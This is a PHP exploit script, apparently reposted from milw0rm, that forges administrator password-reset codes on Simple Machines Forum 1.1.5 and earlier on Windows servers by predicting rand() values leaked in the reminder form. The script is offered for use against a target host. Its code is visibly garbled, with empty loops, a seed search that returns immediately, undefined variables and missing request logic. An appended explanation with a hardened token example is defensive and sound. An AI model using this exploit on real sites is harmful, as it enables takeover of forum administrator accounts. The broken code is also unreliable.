Code:
<?php
echo "---------------------------------------------------------------\n";
echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "---------------------------------------------------------------\n";
if ($argc<3) {
    echo "USAGE:\n";
    echo "~~~~~~\n";
    echo "php {$argv[0]} [host] [path] OPTIONS\n\n";
    echo "[host] - target server where SMF is installed\n";
    echo "[path] - path to SMF\n\n";
    echo "OPTIONS:\n";
    echo "--userid=[value] (default: 1)\n";
    echo "--username=[value] (default: admin)\n";
    echo "examples:\n";
    echo "php {$argv[0]} site.com /forum/\n";
    echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n";
    die;
}
/**
 * Software site: http://www.simplemachines.org
 *
 * SMF leaks current state of random number generator through hidden input parameter `sc`
 * of the password reminder form:
 *
 * $_SESSION['rand_code'] = md5(session_id() . rand());
 * $sc = $_SESSION['rand_code'];
 *
 * Since max random number generated with rand() on win32 is 32767 and session id
 * is known an attacker can reverse the md5 hash and get the random number value.
 * On win32 every random number generated with rand() is used as a seed for the next
 * random number. So if SMF is installed on win32 platform an attacker can predict
 * all the next random numbers. When password reset is requested SMF uses rand()
 * function to generate validation code:
 *
 * $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
 *
 * So prediction of the validation code is possible and an attacker can set his
 * own password for any user.
 *
 * More information about random number prediction:
 * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/
 *
 * More information about the behaviour of rand() on win32 (in Russian):
 * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/
 */
$host = $argv[1];
$path = $argv[2];
for($i=3;$i<=$argc;$i++){
}
}
}
echo "[~] Connecting to $host ...\n";
$packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cookie: PHPSESSID=$sess;\r\n";
$packet.= "Keep-Alive: 300\r\n";
$packet.= "Connection: keep-alive\r\n\r\n";
$md5 = $out[1];
break;
}
}
if($md5) {
    $seed = getseed($md5);
    if($seed) {
        echo "[+] Seed for next random number is $seed\n";
    }
function getseed($md5) {
    global $sess;
    for($i=0;$i<=32767;$i++){
        return $i;
    }
}
}
$packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cookie: PHPSESSID=$sess;\r\n";
$packet.= "Connection: close\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= $data;
$resp='';
}
}
}
for($i=0;$i<6;$i++){
}
echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
?>
# milw0rm.com [2008-09-06]
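The root cause described in the exploit's comment block is the token source, not the reminder flow: rand() on win32 returns at most 32767 distinct values, so md5(session_id() . rand()) and md5(rand()) carry about 15 bits of secret material and the first one is recoverable by anyone who already holds the session id. The snippet below is an added example, not SMF's code and not part of the exploit; it places the weak construction quoted on the page next to a hardened form that draws the validation code from the CSPRNG and compares it in constant time. It assumes PHP 7 or later (for random_bytes) and the function names are invented for illustration.

```php
<?php
// Added example (not SMF's own code, not the exploit's): weak token construction
// as quoted in the exploit's comment, beside a hardened form.

// Weak: as in SMF <= 1.1.5. rand() on win32 yields at most 32767 values, so the
// resulting code has only ~15 bits of entropy, and because each output seeds the
// next call, leaking one value (the `sc` field) lets the next one be predicted.
// The preg_replace is a no-op on md5's hex output and adds no entropy.
function weak_validation_code(): string
{
    return substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
}

// Hardened: take the code from the operating system CSPRNG. Its value is
// independent of the session id and of any earlier output, so knowing `sc`
// gives no information about the reset code. 16 bytes = 128 bits; hex keeps
// the code within the [0-9a-f] character class SMF already handled.
function secure_validation_code(): string
{
    return bin2hex(random_bytes(16));
}

// Hardened check: constant-time comparison of the stored code against the one
// submitted in the reset URL, so response timing does not leak matching prefixes.
function validation_code_matches(string $stored, string $submitted): bool
{
    return hash_equals($stored, $submitted);
}

// Size of the search space an attacker faces, in bits, for a generator whose
// largest output is $max (32767 is the win32 rand() maximum the exploit relies on).
function keyspace_bits(int $max): float
{
    return log($max + 1, 2);
}

printf("weak token:   %s (%.0f bits)\n", weak_validation_code(), keyspace_bits(32767));
printf("secure token: %s (%d bits)\n", secure_validation_code(), 16 * 8);
```

The weak function runs only to show the shape of the value; the hardened pair (generation plus hash_equals check) is the pattern to look for when reviewing any reset, invite or confirmation flow that builds its secret from rand(), mt_rand() or uniqid().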
Sources:
http://milw0rm.com/exploits/6392
http://www.jccharry.com/blog/2008/09/07/whk_vulnerabilidad-en-sistema-de-foros-smf-115-y-versiones-anteriores.html